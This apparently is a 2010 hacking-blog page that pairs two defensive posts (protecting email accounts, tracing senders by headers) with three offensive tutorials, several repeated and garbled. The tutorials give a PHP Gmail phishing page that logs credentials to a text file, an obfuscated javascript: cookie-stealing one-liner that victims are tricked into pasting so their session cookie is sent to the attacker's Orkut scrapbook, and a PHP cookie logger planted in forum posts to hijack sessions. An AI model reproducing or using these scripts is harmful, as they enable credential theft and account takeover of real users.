Tuesday, December 28, 2010
How to Protect an Email Account from Being Hacked?
If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.
1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.
Solution:
* Never try to login/access your email account from the sites other than the original site.
* Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.
Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.
3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.
How To Trace an Email Address And Original Sender?
TRACING AN EMAIL ADDRESS
The purpose of this guide is to show the process involved in tracing an email. The first step required to tracing an email is finding out the headers of the email. What are headers? Email headers are lines added at the top of an email message that are used by servers as the email goes on route to get delivered. Generally email clients only show the standard To, From, and Subject headers, but there are more.
1) Enabling Email Headers
Enabling Email Headers For GmailStep 1:Once Logged into your Gmail Account open the Email whose headers you want to view. Click on the “More Options” link in the message next to the date of the email.
Step 2: Now click the “Show Original” link.
Step 3: This link will popup a new window the headers and the body of the message.
Enabling Email Headers For Hotmail
Step 1:Once logged in, click on the "Options" link in the upper navigation bar.
Step 2: Now click on the "Mail Display Settings" link.
Step 3: Change the "Message Headers" option to "Full" and click ok.
Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.
Enabling Email Headers For Yahoo
Step 1:Once logged in, click on the "Options" link in the upper navigation bar.
Step 2: Now click on the "General Preferences" link.
Step 3: In the paragraph titled Messages and locate the "Headers" heading and select "All".
Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.
2) Understanding Email Headers
In this example the “Sender” located at sender@exampleuniversity.edu want to send an email to “Receiver” located at receiver@exampleisp.com. The sender composes his email at his workstation in the university’s computer lab (lab.exampleuniversity.edu). Once completed the email message is passed to the university’s mail server called mail.exampleuniversity.com. The mail server seeing that it has a message for receiver@exampleisp.com, contacts someisp.com mail server and delivers the email to it. The email is stored on someisp.com server until Receiver logs on to check his/her inbox.
In this example, four headers will be added to the email message. This first header is generated by email client on lab.exampleuniversity.edu when forwarding it to the mail server at mail.exampleuniversity.edu.
The following header is added when mail.exampleuniversity.edu transmits the message to mail.exampleisp.com.
The following header is added when mail.exampleisp.com stores the message on the server for Reciever.
The following header is added when Reciever downloads the email from home machine called reciever.local.
3) Tracking The Orginal Sender
The easiest way for finding the original sender is by looking for the X-Originating-IP header, this header is important since it tells you the IP Address of the computer that had sent the email. If you can not find the X-Originating-IP header then you will have to sift through the Received headers to find the sender's ip.
Once the email sender's ip is found go to http://www.arin.net/ to begin a search.
Now click on the "NET-24-16-0-0-1" link.
Scroll down the page untill you find the OrgAbuseEmail field.
Remember to include all the headers of the email along with an attached copy when filling a complaint.
The purpose of this guide is to show the process involved in tracing an email. The first step required to tracing an email is finding out the headers of the email. What are headers? Email headers are lines added at the top of an email message that are used by servers as the email goes on route to get delivered. Generally email clients only show the standard To, From, and Subject headers, but there are more.
1) Enabling Email Headers
Enabling Email Headers For GmailStep 1:Once Logged into your Gmail Account open the Email whose headers you want to view. Click on the “More Options” link in the message next to the date of the email.
Step 3: This link will popup a new window the headers and the body of the message.
Enabling Email Headers For Hotmail
Step 1:Once logged in, click on the "Options" link in the upper navigation bar.
Step 2: Now click on the "Mail Display Settings" link.
Step 3: Change the "Message Headers" option to "Full" and click ok.
Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.
Enabling Email Headers For Yahoo
Step 1:Once logged in, click on the "Options" link in the upper navigation bar.
Step 2: Now click on the "General Preferences" link.
Step 3: In the paragraph titled Messages and locate the "Headers" heading and select "All".
Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.
2) Understanding Email Headers
In this example the “Sender” located at sender@exampleuniversity.edu want to send an email to “Receiver” located at receiver@exampleisp.com. The sender composes his email at his workstation in the university’s computer lab (lab.exampleuniversity.edu). Once completed the email message is passed to the university’s mail server called mail.exampleuniversity.com. The mail server seeing that it has a message for receiver@exampleisp.com, contacts someisp.com mail server and delivers the email to it. The email is stored on someisp.com server until Receiver logs on to check his/her inbox.
In this example, four headers will be added to the email message. This first header is generated by email client on lab.exampleuniversity.edu when forwarding it to the mail server at mail.exampleuniversity.edu.
The following header is added when mail.exampleuniversity.edu transmits the message to mail.exampleisp.com.
The following header is added when mail.exampleisp.com stores the message on the server for Reciever.
The following header is added when Reciever downloads the email from home machine called reciever.local.
3) Tracking The Orginal Sender
The easiest way for finding the original sender is by looking for the X-Originating-IP header, this header is important since it tells you the IP Address of the computer that had sent the email. If you can not find the X-Originating-IP header then you will have to sift through the Received headers to find the sender's ip.
Once the email sender's ip is found go to http://www.arin.net/ to begin a search.
Now click on the "NET-24-16-0-0-1" link.
Scroll down the page untill you find the OrgAbuseEmail field.
Remember to include all the headers of the email along with an attached copy when filling a complaint.
Phishing with gmail !
Phishing:
This is the most common attack. In this attack the attacker creates a fake page and sends it to the victim. The victim fills the login information and when he clicks on login the information is send to the attacker.
The Method:
Here we will make a fake page for gmail.
-Go to http://www.gmail.com/ and save the home page.
-Rename it to index.html
-type the following script in notepad and save it in the same dictionary as gmail.php and create another text file and name it to passwd.txt
Header(“Location:
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcac
he=2 “);
$handle = fopen(“passwd.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
Fwrite($handle, “rn”);
fclose($handle);
exit;
?>
-Edit the main gmail page in the notepad and press + F and type action and press “Find Next”.
You should see this:
-Change the link between''action=https://www.gmail.com/accounts/serviceloginAuth?service=mail'' to gmail.php.After this link you will see method=''post''
change it to method=''get''
-Save everything and upload it to a free hosting site make sure to give writing permission to passwd.txt
so now send the link to any one and when he fills everything then his username and password will get saved in passwd.txt so to view it you will have to type
http://www.yourwebsite.com/youraccount/list.txt. In your url.
These were some of the methods to crack a password. Other method include compromising the website/computer,,,
This is the most common attack. In this attack the attacker creates a fake page and sends it to the victim. The victim fills the login information and when he clicks on login the information is send to the attacker.
The Method:
Here we will make a fake page for gmail.
-Go to http://www.gmail.com/ and save the home page.
-Rename it to index.html
-type the following script in notepad and save it in the same dictionary as gmail.php and create another text file and name it to passwd.txt
Header(“Location:
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcac
he=2 “);
$handle = fopen(“passwd.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
Fwrite($handle, “rn”);
fclose($handle);
exit;
?>
-Edit the main gmail page in the notepad and press + F and type action and press “Find Next”.
You should see this:
-Change the link between''action=https://www.gmail.com/accounts/serviceloginAuth?service=mail'' to gmail.php.After this link you will see method=''post''
change it to method=''get''
-Save everything and upload it to a free hosting site make sure to give writing permission to passwd.txt
so now send the link to any one and when he fills everything then his username and password will get saved in passwd.txt so to view it you will have to type
http://www.yourwebsite.com/youraccount/list.txt. In your url.
These were some of the methods to crack a password. Other method include compromising the website/computer,,,
New cookies stealing from mozilla firefox !!!
Procedure to hack gmail or orkut through mozilla by stealing cookies:-
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()
5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).
Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.
- Firstly you need have Mozilla firefox.
- Download cookie editor plugin for Mozilla firefox.
- You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()
How to use cookies script?
1. Replace your number " UserId.value=33444211 "
How to Replace your Number ????
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg
It will be a Eight Digit Value.
3. Now replace your value with the value in the java script .
4. Now Your script will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).
Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.
Create a CookieLogger and Hack any Account!
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;Step 3: Create a new Notepad File and Save it as logfile.txt
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.netStep 5: Go to the victim forum and insert this code in the signature or a post :
Download it.Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.
Monday, December 27, 2010
Subscribe to:
Posts (Atom)